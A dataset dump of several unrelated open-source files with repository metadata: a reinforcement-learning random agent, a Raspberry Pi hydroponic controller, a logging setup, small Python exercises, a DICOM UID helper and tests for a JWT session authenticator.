| permissive | https://github.com/tzahishimkin/extended-hucrl | 07609f9e9f9436121bcc64ff3190c966183a2cd9 | c144aeecba5f35ccfb4ec943d29d7092c0fa20e3 | refs/heads/master | 2023-07-09T22:57:28.682494 | 2021-08-24T08:50:16 | 2021-08-24T08:50:16 | 383,819,908 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """Implementation of a random agent."""
from rllib.policy import RandomPolicy
from .abstract_agent import AbstractAgent
class RandomAgent(AbstractAgent):
"""Agent that interacts randomly in an environment."""
def __init__(
self, dim_state, dim_action, num_states=-1, num_actions=-1, *args, **kwargs
):
super().__init__(*args, **kwargs)
self.policy = RandomPolicy(
dim_state, dim_action, num_states=num_states, num_actions=num_actions
)
@classmethod
def default(cls, environment, *args, **kwargs):
"""See `AbstractAgent.default'."""
return super().default(
environment=environment,
dim_state=environment.dim_state,
dim_action=environment.dim_action,
num_states=environment.num_states,
num_actions=environment.num_actions,
*args,
**kwargs,
)
def end_episode(self):
"""See `AbstractAgent.end_episode'."""
super().end_episode()
| UTF-8 | Python | false | false | 1,023 | py | 381 | random_agent.py | 340 | 0.600196 | 0.59824 | 0 | 34 | 29.088235 | 83 |
virtue244/Remote_Hydroponic_Growing_Platform | 2,164,663,542,657 | 1ab9c8b83678e2321e7ad361e2363f42daa1a5f4 | b8a1cde0b85ff9400319e79a6418247368cc91c6 | /hydroponicPlantPlatform.py | 7d652bfdcee256a1e37c07880163a351a2185c25 | []
| no_license | https://github.com/virtue244/Remote_Hydroponic_Growing_Platform | 6eeaf5ade42d445e862eb57ccf4d8ec5132eb797 | 60ff51aea68b98d39a6b75d71cf98b140f9be1e4 | refs/heads/master | 2021-09-13T07:29:22.787723 | 2018-04-26T13:41:27 | 2018-04-26T13:41:27 | 124,950,810 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# Software created by Drew Davis and Dylan Victory
# December 2017
#
# This software allows the monitoring and control of a hydroponic plant platform
# It utilizes a grove sunlight sensor, as well as moisture sensors to achieve this
# A simple UI allows the user to choose the sunlight level/time between fertilizations they would like.
# The moisture sensors are monitoring the moisture level in the platform every 15 minutes
# This determines when to activate a power tail switch connected to a water pump, which will pump water.
# The sunlight sensor determines when to activate the light, based on how much light the user wants
# the plant to have.
from Tkinter import *
from datetime import datetime
import time
import thread
import SI1145
import RPi.GPIO as GPIO
keepRunning = False
dayOfWeek = datetime.now().weekday()
fertCounter = 0
# Utilizes two global variables for the purpose of checking when it is the day
# a fertilization needs to be done. Checks the integer value of the current day
# to see if it has changed to a new day. Counter is incremented to account for
# new day. Once counter is equal to the days between fertilizations set, fertilize.
# Set counter back to 0 to restart counter
def fertCheck():
global dayOfWeek
global fertCounter
if datetime.now().weekday() != dayOfWeek:
fertCounter += 1
dayOfWeek = datetime.now().weekday()
if fertCounter == int(e2.get()):
print "FERTILIZE!FERTILIZE!FERTILIZE!FERTILIZE!FERTILIZE!"
GPIO.output(fertPower_pin, True)
time.sleep(15)
GPIO.output(fertPower_pin, False)
fertCounter = 0
# Utilize an if else statement to check if the input is high or low. If high, indicates
# that moisture levels are low. Activates the water pump through the power switch tail.
# Waters for 15 seconds before shutting off the pump. Else it just continues and makes sure
# pump is shut off.
def detectMoisture():
if GPIO.input(moisturePinInput):
print "Water needed for plant"
GPIO.output(pumpPower_pin, True)
time.sleep(15)
GPIO.output(pumpPower_pin, False)
else:
print "Water levels acceptable"
GPIO.output(pumpPower_pin, False)
# Get infrared light reading from sunlight sensor, print out value. Check to see if the time
# is between 8AM and 6PM. If it is, check to see what value was provided for sunlight value
# by user. Set desired light level to user defined level. Run a check to see if the infrared
# light level from sensor is less than user defined level. Turn light on if it is. If not, make
# sure light is off.
def detectSunlight():
IR = sensor.readIR()
print('IR: ' + str(IR))
if datetime.now().hour >= 8 or datetime.now().hour < 18:
if tkvar.get() == 'Full Sun':
print '800 Lumens'
lumenLevel = 800
elif tkvar.get() == 'Partial Sun':
print '500 Lumens'
lumenLevel = 500
elif tkvar.get() == 'Shaded':
print '250 Lumens'
lumenLevel = 250
if IR < lumenLevel:
GPIO.output(lightPower_pin, True)
print 'Light turned on'
else:
GPIO.output(lightPower_pin, False)
# Main loop
def run_scheduler():
global keepRunning
keepRunning = True
e1.config(state="disabled")
e2.config(state="disabled")
startButton.config(state="disabled")
stopButton.config(state="active")
quitButton.config(state="disabled")
#SCHEDULER LOOP
while keepRunning:
try:
fertCheck()
detectMoisture()
except:
GPIO.output(pumpPower_pin, False)
GPIO.output(fertPower_pin, False)
print "Malfunction, turning off pumps for safety."
detectSunlight()
time.sleep(900)
# Stops main loop, deactivates all pins to shut off power to pumps and light
def stop_scheduler():
global keepRunning
keepRunning = False
print "Feeder Stopped"
e1.config(state="active")
e2.config(state="normal")
startButton.config(state="active")
stopButton.config(state="disabled")
quitButton.config(state="active")
GPIO.output(pumpPower_pin, False)
GPIO.output(lightPower_pin, False)
GPIO.output(fertPower_pin, False)
# Starts main loop
def start_scheduler():
thread.start_new_thread(run_scheduler, ())
sensor = SI1145.SI1145()
GPIO.setmode(GPIO.BCM)
moisturePinInput = 17
pumpPower_pin = 27
lightPower_pin = 22
fertPower_pin = 23
GPIO.setup(moisturePinInput, GPIO.IN)
GPIO.setup(pumpPower_pin, GPIO.OUT)
GPIO.setup(lightPower_pin, GPIO.OUT)
GPIO.setup(fertPower_pin, GPIO.OUT)
GPIO.output(pumpPower_pin, False)
GPIO.output(lightPower_pin, False)
GPIO.output(fertPower_pin, False)
master = Tk()
master.title("Pet Feeder")
Label(master, text="Daily UV Dose (Lumens)").grid(row = 0)
Label(master, text="Fertilizer Interval (Days)").grid(row = 1)
tkvar = StringVar(master)
options = {'Full Sun', 'Partial Sun', 'Shaded'}
tkvar.set('Shaded')
e1 = OptionMenu(master, tkvar, *options)
e1.grid(row = 0, column = 1)
e2 = Entry(master)
e2.grid(row = 1, column = 1)
startButton = Button(master, text="Start", command = start_scheduler)
startButton.grid(row = 3, column = 0)
quitButton = Button(master, text="Quit", command = master.destroy)
quitButton.grid(row = 3, column = 1)
stopButton = Button(master, text="Stop", command = stop_scheduler)
stopButton.grid(row = 4, column = 0)
stopButton.config(state="disabled")
master.mainloop()
| UTF-8 | Python | false | false | 5,582 | py | 49 | hydroponicPlantPlatform.py | 47 | 0.683626 | 0.668757 | 0 | 175 | 30.891429 | 104 |
ericl1u/northeastern-scheduler | 3,238,405,347,486 | a53f8ef70db7b93ce884e600ee54e284a108e8c9 | f6b68a10af84b0a71b33789a8b7abdda30d290e0 | /app/logging.py | 98287e8c414612e32b96a572f96b2262b70f2b07 | [
"Apache-2.0"
]
| permissive | https://github.com/ericl1u/northeastern-scheduler | ef4d26ce4d98df8c24ee9d855d16566feca28242 | c3cf02c41ac32b2992ab82ce73a67e25aa69102e | refs/heads/master | 2021-05-01T03:28:09.152720 | 2018-01-10T15:11:48 | 2018-01-10T15:11:48 | 65,651,658 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import logging
from logging.handlers import RotatingFileHandler
from app import app
file_handler = RotatingFileHandler('NortheasternSchedule.log', 'a', 10 * 1024 * 1024, 10)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.setLevel(logging.WARNING)
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
app.logger.info('NortheasternSchedule startup') | UTF-8 | Python | false | false | 451 | py | 32 | logging.py | 13 | 0.789357 | 0.762749 | 0 | 11 | 40.090909 | 115 |
erdincuzun/PythonCourse | 16,655,883,177,695 | c4c709f37b2c2ca8ede69c504668b9ee75227d9a | 765be0a4b92f66c4b00aef65e33f4fd4cbd4caf4 | /Course07/Ders0703.py | eceae3db09cb782068d14467ada4df9764c3b212 | []
| no_license | https://github.com/erdincuzun/PythonCourse | bb195c8b1956510c39b00498f5a9ca7e2278b004 | 489256b3e4207abfb8f41f8318ddb99fb645cdc5 | refs/heads/master | 2022-05-12T20:32:25.752886 | 2022-04-14T16:35:20 | 2022-04-14T16:35:20 | 156,826,183 | 11 | 6 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 'Merhaba Deneme'
def kactane(s):
d = {}
for thes in s:
if thes in d:
d[thes] += 1
else:
d[thes] = 1
return d
print(kactane('Merhaba Deneme')) | UTF-8 | Python | false | false | 207 | py | 39 | Ders0703.py | 10 | 0.444444 | 0.434783 | 0 | 11 | 16.909091 | 32 |
cbao/Basic-sorting-algorithms | 14,310,831,041,619 | 426d2311cff8984997ffe90688760ad3f8d087fd | 09a8e5def07d312075bfed040cd94ba6f1f27923 | /heapsort.py | f843afef511ec22bd1687783b9b2d2cb2da01af4 | []
| no_license | https://github.com/cbao/Basic-sorting-algorithms | cac524771499218c02b0ab468e9e922a14e898e3 | 7ad100c8feb91cee426b70f5340074359bac26a3 | refs/heads/master | 2016-03-18T23:25:37.023509 | 2015-08-12T15:25:59 | 2015-08-12T15:25:59 | 16,318,237 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def heapsort(data):
sortedList = []
heap = build_heap(data)
while len(heap) != 0:
min, heap = extractmin(heap)
sortedList.append(min)
print sortedList
return sortedList
def extractmin(heap):
heap[0], heap[-1] = heap[-1], heap[0]
removal = heap.pop()
heap = siftDown(heap)
return removal, heap
def siftDown(heap):
if len(heap) == 2:
return [min(heap), max(heap)]
currentIndex = 0
while 2*currentIndex + 2 < len(heap):
A = 2*currentIndex + 1
B = 2*currentIndex + 2
if heap[currentIndex] > min(heap[A], heap[B]):
if min(heap[A], heap[B]) == heap[A]:
heap[currentIndex], heap[A] = heap[A], heap[currentIndex]
currentIndex = A
else:
heap[currentIndex], heap[B] = heap[B], heap[currentIndex]
currentIndex = B
else:
return heap
return heap
def build_heap(data):
result = []
for i in data:
print result
result.append(i)
heapify(result)
return result
def heapify(data):
nodeIndex = len(data) - 1
while nodeIndex > 0:
if data[nodeIndex] < data[(nodeIndex - 1)/2]:
data[nodeIndex], data[(nodeIndex - 1)/2] = data[(nodeIndex - 1)/2], data[nodeIndex]
nodeIndex = (nodeIndex - 1)/2
return data
def main():
a = [12, 97, 67, 16, 30, 7, 65, 43, 59, 59, 39, 93, 72, 59, 67, 60, 35, 79, 29, 53]
print a
print heapsort(a)
if __name__=="__main__":
main()
| UTF-8 | Python | false | false | 1,617 | py | 8 | heapsort.py | 7 | 0.517625 | 0.479283 | 0 | 61 | 25.508197 | 95 |
ranjansarma/attendance | 11,493,332,506,183 | 1b9890466f0a78578d58a10241c71c16730c3560 | 9e0514909e310831fe12cb2c6c5c2019d14de7f2 | /sms.py | 5f0bc4914b9d0628373c0a4c2ddd50d72938ff07 | [
"MIT"
]
| permissive | https://github.com/ranjansarma/attendance | 17e5020379abdad135859f325923733902f876c5 | f3b801ceda16b54d052ec380688152a24c64c2e7 | refs/heads/master | 2020-09-28T11:24:40.449770 | 2016-08-30T07:08:17 | 2016-08-30T07:08:17 | 66,455,393 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import urllib
import urllib2
def notify(message):
params = {
'api_key': '',
'api_secret': '',
'to': '',
'from': 'RND',
'text': message
}
url = 'https://rest.nexmo.com/sms/json?' + urllib.urlencode(params)
request = urllib2.Request(url)
request.add_header('Accept', 'application/json')
response = urllib2.urlopen(request)
| UTF-8 | Python | false | false | 389 | py | 3 | sms.py | 2 | 0.565553 | 0.557841 | 0 | 17 | 21.823529 | 71 |
erling6232/imagedata | 7,026,566,530,385 | f1c6eb2570fa4adb717a98197822c06e7ed132af | e35c6f465144abb59827a962aa382238c987fd48 | /src/imagedata/formats/dicomlib/uid.py | 00b980477bdae208a7f17296953210f3545ef303 | [
"MIT"
]
| permissive | https://github.com/erling6232/imagedata | 500cee6c992a18c4dfa6a49f535ff0e3d36398b5 | 5fa118b2017db27ef4dbcd415804402fa3d82da3 | refs/heads/master | 2023-09-01T11:49:45.445250 | 2023-09-01T06:42:01 | 2023-09-01T06:42:01 | 123,263,810 | 10 | 0 | MIT | false | 2023-08-23T12:03:53 | 2018-02-28T09:43:45 | 2023-04-11T03:19:15 | 2023-08-23T12:03:52 | 110,228 | 9 | 0 | 9 | Python | false | false | """DICOM UID tool."""
# Copyright (c) 2013-2021 Erling Andersen, Haukeland University Hospital
# import os
import os.path
import uuid
import time
import pydicom._uid_dict
# from pydicom.uid import UID
_hostid = None
def get_hostid() -> str:
"""Return hostid of running system.
"""
global _hostid
if _hostid is None:
# _hostid = os.popen('hostid').read().strip()
_hostid = hex(uuid.getnode())[2:]
return _hostid
def get_uid() -> str:
"""Generator function which will return a unique UID.
"""
k = 0
# hostid = get_hostid()[:-1]
hostid = get_hostid()
ihostid = int(hostid, 16)
my_root = "2.16.578.1.37.1.1.2.%d.%d.%d" % (ihostid, os.getpid(), int(time.time()))
while True:
k += 1
yield "%s.%d" % (my_root, k)
def uid_append_instance(root, num) -> str:
return root + "." + str(num)
def get_uid_for_storage_class(name) -> str:
"""Return DICOM UID for given DICOM Storage Class
Args:
name: name or UID of DICOM storage class (str)
Returns:
DICOM UID
Raises:
ValueError: When name does not match a SOP Class
"""
if name == "SC":
name = "SecondaryCaptureImageStorage"
for uid in pydicom._uid_dict.UID_dictionary.keys():
if name == uid:
return uid
if name == uid[4] or name + "Storage" == uid[4] or name + "ImageStorage" == uid[4]:
return uid
raise ValueError("Storage class {} is unknown.".format(name))
| UTF-8 | Python | false | false | 1,500 | py | 97 | uid.py | 53 | 0.590667 | 0.571333 | 0 | 59 | 24.423729 | 91 |
snigdhasambitak/python-scripts | 17,042,430,259,788 | d641b78fbf285d9990e4e6f1f59ccad03ba5b92c | aa663d4567f8a34a6705df71a6b829cb6ac353ed | /count_primes.py | 2ca6a4b0dcc03be24f6797751316bb6c0963bcff | []
| no_license | https://github.com/snigdhasambitak/python-scripts | cd5df9cde2e31a4427ff1db6d078c91988e9eca4 | f059d36a13657e33e0261d4d3a7805d90d8b382b | refs/heads/main | 2023-05-03T22:23:45.454773 | 2021-05-17T17:28:25 | 2021-05-17T17:28:25 | 360,143,354 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #### COUNT PRIMES: Write a function that returns the *number* of prime numbers that exist up to and including a given number
# count_primes(100) --> 25
# By convention, 0 and 1 are not prime.
def count_primes(num):
counter = 0
primes = []
for n in range(2,num+1):
prime=1
for i in range(2,n):
if(n%i == 0):
prime += 1
break
if prime == 1:
counter += 1
primes.append(n)
print(primes)
return counter
print(count_primes(100)) | UTF-8 | Python | false | false | 543 | py | 17 | count_primes.py | 16 | 0.541436 | 0.506446 | 0 | 23 | 22.652174 | 124 |
ShivamTyagi05/Machine-Learning-Algos-Study | 5,488,968,250,605 | 5e01171decba2c19d39e5d01c31c2041909b80c7 | 3a7a3c141f3d59ed3063050b5fbd93bc149e3f87 | /ClusteringStudy.py | 454cb90fba501a6158d2ecb1782e13c50663a3c6 | []
| no_license | https://github.com/ShivamTyagi05/Machine-Learning-Algos-Study | da948488c0dc564e0dea50839c02713f977c4289 | 6814a7fe45e3cfdf8d303fd1e3342e9fb12154cd | refs/heads/master | 2020-06-19T11:08:23.145354 | 2019-07-13T07:11:40 | 2019-07-13T07:11:40 | 196,687,458 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sklearn.cluster import KMeans
from sklearn.datasets import load_iris
from sklearn.datasets import fetch_mldata
import matplotlib.pyplot as plt
import numpy as np
x = np.array([[5,3],[10,15],[15,12],[24,10],[30,45],[85,70],[71,80],[60,78],[55,52],[80,91]])
plt.scatter(x[:,0],x[:,1])
sos = []
for k in range(1,10): #Elbow method to find the number of cluster
km = KMeans(n_clusters = k)
km.fit(x)
a = km.inertia_
sos.append(a)
klist = [k for k in range(1,10)]
plt.plot(klist,sos)
print(km.cluster_centers_)
print(km.inertia_)
print(km.labels_)
print(km.n_iter_)
plt.scatter(x[:,0],x[:,1],c = km.labels_)
plt.scatter(km.cluster_centers_[:,0],km.cluster_centers_[:,1])
km.predict(np.array([25,25]).reshape(1,-1))
# Iris Dataset
ir = load_iris()
d = ir.data
sos1 = []
for k in range(1,15): #Elbow method to find the number of cluster
km = KMeans(n_clusters = k)
km.fit(d)
a = km.inertia_
sos1.append(a)
klist1 = [k for k in range(1,15)]
plt.plot(klist1,sos1)
print(km.cluster_centers_)
print(km.inertia_)
print(km.labels_)
print(km.n_iter_)
km.predict(np.array([1.5,4.8,3.6,2.4]).reshape(1,-1))
#mnist Dataset
mnist = fetch_mldata("mnist-original")
d = mnist.data
sos1 = []
for k in range(1,15): #Elbow method to find the number of cluster
km = KMeans(n_clusters = k)
km.fit(d)
a = km.inertia_
sos1.append(a)
klist1 = [k for k in range(1,15)]
plt.plot(klist1,sos1)
print(km.cluster_centers_)
print(km.inertia_)
print(km.labels_)
print(km.n_iter_) | UTF-8 | Python | false | false | 1,587 | py | 9 | ClusteringStudy.py | 8 | 0.625079 | 0.569628 | 0 | 64 | 23.8125 | 93 |
neimasilk/preprocessing | 5,239,860,133,312 | 9dd3b474b039bec8ba32adfff0e073f54c5a674f | 7e872f1abdd918c8f8302a1e1feb1f19d1101677 | /translate_dbase_google.py | a3c99d61b78c8f32b2bafd0fc0dee56d50eabbe8 | []
| no_license | https://github.com/neimasilk/preprocessing | 832ce0414d5e1698c897d271239b997adbfea273 | 8fc5be71db34c826c9ce38a7427164a61c5bfc52 | refs/heads/master | 2022-12-24T02:52:42.666144 | 2022-12-13T14:17:17 | 2022-12-13T14:17:17 | 153,034,488 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sqlite3
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="/home/mukhlis/seq2seq-e71dee1db5ca.json"
from google.cloud import translate
translate_client = translate.Client()
filepath = 'indonesia_sentences_10.db'
try:
db_connection = sqlite3.connect(filepath)
db_cur = db_connection.cursor()
except Error as e:
print(e)
sentences = []
db_cur.execute("select id, text_id, text_en_id, text_zhcn from id_zhcn where (text_en_id is NULL) or (text_zhcn is NULL) ")
textnya = db_cur.fetchall()
sql = ''' UPDATE id_zhcn
SET text_en_id = ?, text_zhcn=?
WHERE id = ? '''
for id in textnya:
if (id[2] == None) or (id[3]==None):
idnya = id[0]
teks = id[1]
if (id[2]==None):
translation = translate_client.translate(
teks,
target_language='en', source_language='id')
artinya = translation['translatedText']
else:
artinya = id[2]
if (id[3]==None):
translation = translate_client.translate(
artinya,
target_language='zh-CN', source_language='en')
articn=translation['translatedText']
else:
articn = id[3]
db_cur.execute(sql,[artinya,articn,idnya])
db_connection.commit()
print(idnya)
db_connection.close() | UTF-8 | Python | false | false | 1,357 | py | 15 | translate_dbase_google.py | 12 | 0.588799 | 0.576271 | 0 | 51 | 25.627451 | 123 |
pushmeetkapoor/new_django_pro | 16,862,041,618,308 | 4a6cd13b02fed3f67936a9a3bb23c84f922fc6a6 | fbdb191ec82ad4a687faecfe4b854224dbdc8c03 | /steam_trap/serializers.py | d142c985dd2e578f703df8db604e75a43892f07c | []
| no_license | https://github.com/pushmeetkapoor/new_django_pro | 6fe0166f0b9502659ffdf5bae9e08a3a29ea2f39 | 221194916cf7f4a4a6c2fe400d8b3122a7806a0f | refs/heads/master | 2021-01-10T04:44:10.321087 | 2016-03-21T04:08:01 | 2016-03-21T04:08:01 | 54,358,090 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import serializers
from steam_trap.models import SteamTrap
from django.contrib.auth.models import User
class SteamTrapSerializer(serializers.HyperlinkedModelSerializer):
owner = serializers.ReadOnlyField(source='owner.username')
start_date = serializers.ReadOnlyField()
id = serializers.ReadOnlyField()
get_steam_energy_btu_per_lb = serializers.ReadOnlyField()
get_steam_loss_pph = serializers.ReadOnlyField()
get_gas_usage_therms_per_hour = serializers.ReadOnlyField()
absolute_pressure_psia = serializers.ReadOnlyField()
size_trap_orifice = serializers.ReadOnlyField()
get_cost_per_hour = serializers.ReadOnlyField()
get_cost_per_year = serializers.ReadOnlyField()
get_therm_rate = serializers.ReadOnlyField()
class Meta:
model = SteamTrap
fields = ('id', 'url', 'client', 'start_date', 'steam_trap_number',
'hours_of_operation', 'owner', 'boiler_efficiency', 'notes',
'location_description', 'pressure_in_psig', 'trap_pipe_size',
'get_steam_energy_btu_per_lb', 'get_steam_loss_pph',
'get_gas_usage_therms_per_hour', 'absolute_pressure_psia',
'size_trap_orifice', 'get_cost_per_hour',
'get_cost_per_year', 'get_therm_rate')
| UTF-8 | Python | false | false | 1,320 | py | 90 | serializers.py | 62 | 0.672727 | 0.672727 | 0 | 26 | 49.769231 | 79 |
nju161250102/leetcode | 5,634,997,109,757 | 4ade3a0385704ef3e6309086d7372b46732addc6 | 7aa75f578603f1ece6fccd7758673066b6bd485f | /122.py | 6184e21b881bdeb27e0fdfe1dc9ca94c97ba301e | []
| no_license | https://github.com/nju161250102/leetcode | 91b01d6662ed9717056f6b62c881136d815dea04 | a7de39f00c9020b615360f37ab50d36f6bd0f608 | refs/heads/master | 2020-03-22T21:33:55.612243 | 2019-04-10T04:40:22 | 2019-04-10T04:40:22 | 140,696,345 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
"""
if len(prices) == 0:
return 0
bp = 0
result = 0
for i in range(1, len(prices)-1):
if prices[i-1] < prices[i] and prices[i+1] <= prices[i]:
result += (prices[i] - prices[bp])
bp = None
elif prices[i-1] >= prices[i] and prices[i+1] > prices[i]:
bp = i
if bp is not None and prices[-1] > prices[bp]:
result += (prices[-1] - prices[bp])
return result | UTF-8 | Python | false | false | 641 | py | 89 | 122.py | 85 | 0.441498 | 0.422777 | 0 | 21 | 29.571429 | 70 |
kkb626/python | 6,399,501,309,981 | 0cee7807b80b5d54462a5728161d4e196322772b | fbcebb4a062ede7e1ec8c3a8da9a0756c5981cee | /문제300/문제021~030.py | c4340d698c2e74e8af99c28f900993b55670366d | []
| no_license | https://github.com/kkb626/python | 6f62174bfd960de189195060f814a0d564c7cb1b | 77f6ce6eb641ae964909d54acbc63804436ff100 | refs/heads/master | 2023-05-07T03:41:46.775964 | 2021-05-30T08:56:54 | 2021-05-30T08:56:54 | 363,334,188 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# 021
letters = 'python'
print(letters[0],letters[2])
# 022
license_plate = "24가 2210"
print(license_plate[4:])
# 023
string = "홀짝홀짝홀짝"
print(string[0: :2])
# 024
string = "PYTHON"
print(string[ : :-1])
# 025
phone_number = "010-1111-2222"
print(phone_number.replace("-"," "))
# 026
phone_number = "010-1111-2222"
print(phone_number.replace("-",""))
# 027
url = "http://sharebook.kr"
print(url.split(".")[1])
# 028
# 오류발생 ; 문자열 일부분은 수정 불가
# 029
string = 'abcdfe2a354a32a'
print(string.replace("a","A"))
# 030
string = 'abcd'
string.replace('b','B')
print(string)
# aBcd | UTF-8 | Python | false | false | 623 | py | 28 | 문제021~030.py | 28 | 0.635579 | 0.512953 | 0 | 40 | 13.475 | 36 |
meyt/microhttp-auth | 1,743,756,732,614 | 2c473a46c7c716e96f3cffa7cb6a051659926d87 | 3d1e71d17cf23900d2f180f706614c661614af0b | /microhttp_auth/tests/test_stateful_authenticator.py | af3b2f324704c09c8c6996dd98eda06643fc2f3c | [
"MIT"
]
| permissive | https://github.com/meyt/microhttp-auth | 51bc66902fdc60051167b03fdbdd2e6e9a5204fc | 55c49876078a7dd0cb76599b6cbe59d379cbca42 | refs/heads/master | 2020-04-12T21:25:42.278598 | 2019-01-27T18:26:27 | 2019-01-27T18:26:27 | 162,761,649 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pytest
from uuid import uuid4
from freezegun import freeze_time
from webtest import TestApp as WebtestApp
from nanohttp import Controller, settings, json, context
from microhttp import Application
from microhttp_auth import StatefulAuthenticator, authorize
session_info_test_cases = [
{
'environment': {
'REMOTE_ADDR': '',
'HTTP_USER_AGENT':
'Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) '
'AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 '
'Mobile/9B179 Safari/7534.48.3 MicrohttpClient-js/1.2.3 (My '
'App; test-name; 1.4.5-beta78; fa-IR; some; extra; info)'
},
'expected_remote_address': 'NA',
'expected_machine': 'iPhone',
'expected_os': 'iOS 5.1',
'expected_agent': 'Mobile Safari 5.1',
'expected_client': 'MicrohttpClient-js 1.2.3',
'expected_app': 'My App (test-name) 1.4.5-beta78',
'expected_last_activity': '2017-07-13T13:11:44',
},
{
'environment': {
'REMOTE_ADDR': '185.87.34.23',
'HTTP_USER_AGENT':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; '
'Trident/5.0) MicrohttpClient-custom/4.5.6 (A; B; C)'
},
'expected_remote_address': '185.87.34.23',
'expected_machine': 'PC',
'expected_os': 'Windows 7',
'expected_agent': 'IE 9.0',
'expected_client': 'MicrohttpClient-custom 4.5.6',
'expected_app': 'A (B) C',
'expected_last_activity': '2017-07-13T13:11:44',
},
{
'environment': {
'REMOTE_ADDR': '172.16.0.111',
'HTTP_USER_AGENT': ''
},
'expected_remote_address': '172.16.0.111',
'expected_machine': 'Other',
'expected_os': 'Other',
'expected_agent': 'Other',
'expected_client': 'Unknown',
'expected_app': 'Unknown',
'expected_last_activity': '2017-07-13T13:11:44',
},
{
'environment': {},
'expected_remote_address': 'NA',
'expected_machine': 'Other',
'expected_os': 'Other',
'expected_agent': 'Other',
'expected_client': 'Unknown',
'expected_app': 'Unknown',
'expected_last_activity': '2017-07-13T13:11:44',
}
]
class RootController(Controller):
@json
@authorize
def motto(self):
return dict(
secret='Draco Dormiens Nunquam Titillandus'
)
@json
@authorize('operator')
def another_motto(self):
return dict(
secret='Titillandus Nunquam Dormiens Draco'
)
@json
@authorize
def get_payload(self):
return context.identity.to_dict()
@json
def get_session_info(self, session_id: str=None):
authenticator = StatefulAuthenticator()
return authenticator.get_session_info(
session_id or context.identity.session_id
) or dict()
@json
@authorize
def terminate_all_sessions(self):
authenticator = StatefulAuthenticator()
authenticator.invalidate_member(context.identity.id)
return dict()
@json
@authorize
def terminate_a_session(self):
authenticator = StatefulAuthenticator()
sessions = list(authenticator.get_member_sessions(context.identity.id))
for session_id in sessions:
if session_id != context.identity.session_id:
authenticator.unregister_session(session_id)
return dict()
@json
@authorize
def get_sessions(self):
authenticator = StatefulAuthenticator()
return list(authenticator.get_member_sessions(context.identity.id))
@json
def login(self, role_name: str='supervisor'):
session_id = str(uuid4()).replace('-', '')
authenticator = StatefulAuthenticator()
access_token = authenticator.__class__.create_token(dict(
id=context.form.get('mobile'),
mobile=context.form.get('mobile'),
roles=[role_name],
sessionId=session_id
))
authenticator.register_session(
member_id=context.form.get('mobile'),
session_id=session_id
)
return dict(
accessToken=access_token
)
class MyApplication(Application):
def __init__(self):
super().__init__(
root=RootController()
)
self.__authenticator__ = StatefulAuthenticator()
def configure(self, *args, **kwargs):
super().configure(*args, **kwargs)
settings.merge("""
auth:
jwt_algorithm: HS256
jwt_secret_key: DSXdzzxxOiIxMjM0NTY3ODkwIiwFtZSI6IkpvadG4gRG9lrr
redis:
host: localhost
port: 6379
""")
def begin_request(self):
self.__authenticator__.authenticate_request()
def prepare(self):
pass
@pytest.fixture(scope='module')
def app():
my_app = MyApplication()
my_app.configure(force=True)
my_app.prepare()
return WebtestApp(my_app, lint=False)
@pytest.fixture(scope='module')
def sample_access_token(app):
resp = app.post('/login/supervisor', params={
'mobile': '935935935'
}).json
return resp['accessToken']
def test_authenticate(app):
# Create access token
resp = app.post('/login/supervisor', params={
'mobile': '935935935'
}).json
access_token1 = resp['accessToken']
# Access granted
app.get('/motto', headers={
'Authorization': access_token1
})
# Access denied
app.get('/motto', status=401)
# Create check another role
resp = app.post('/login/operator', params={
'mobile': '935935936'
}).json
access_token2 = resp['accessToken']
app.get('/motto', headers={
'Authorization': access_token2
})
app.get('/another_motto', headers={
'Authorization': access_token2
})
app.get('/another_motto', headers={
'Authorization': access_token1
}, status=403)
app.get('/another_motto', status=401)
# Empty session info
resp = app.get('/get_session_info/xyz').json
assert len(resp.keys()) == 0
@pytest.mark.parametrize('test_case', session_info_test_cases)
def test_sessions_info(app, sample_access_token, test_case):
with freeze_time("2017-07-13T13:11:44", tz_offset=-4):
payload = app.get(
'/get_payload',
headers={
'Authorization': sample_access_token
},
extra_environ=test_case['environment']
).json
info = app.get('/get_session_info/%s' % payload['sessionId']).json
expected_info = {
'remoteAddress': test_case['expected_remote_address'],
'machine': test_case['expected_machine'],
'os': test_case['expected_os'],
'agent': test_case['expected_agent'],
'client': test_case['expected_client'],
'app': test_case['expected_app'],
'lastActivity': test_case['expected_last_activity']
}
for info_key, info_val in info.items():
assert info_val == expected_info[info_key]
def test_manage_sessions(app):
app.post('/login/operator', params={
'mobile': '935935936'
})
resp = app.post('/login/operator', params={
'mobile': '935935936'
}).json
access_token = resp['accessToken']
# Get sessions
sessions = app.get('/get_sessions', headers={
'Authorization': access_token
}).json
assert len(sessions) > 0
# Terminate one session
app.delete('/terminate_a_session', headers={
'Authorization': access_token
})
# Terminate all sessions
app.delete('/terminate_all_sessions', headers={
'Authorization': access_token
})
# Access denied
app.get('/get_sessions', headers={
'Authorization': access_token
}, status=401)
def test_authenticator(app):
_ = app
from nanohttp.contexts import Context
with Context({}):
authenticator = StatefulAuthenticator()
member_id = 500
for session_id in ('bla_bla1', 'bla_bla2', 'bla_bla3'):
authenticator.register_session(
member_id=member_id,
session_id=session_id
)
# Get session info
info = authenticator.get_session_info(
session_id=session_id
)
assert 'remoteAddress' in info
last_sessions = sessions = authenticator.get_member_sessions(member_id)
assert len(sessions) >= 0
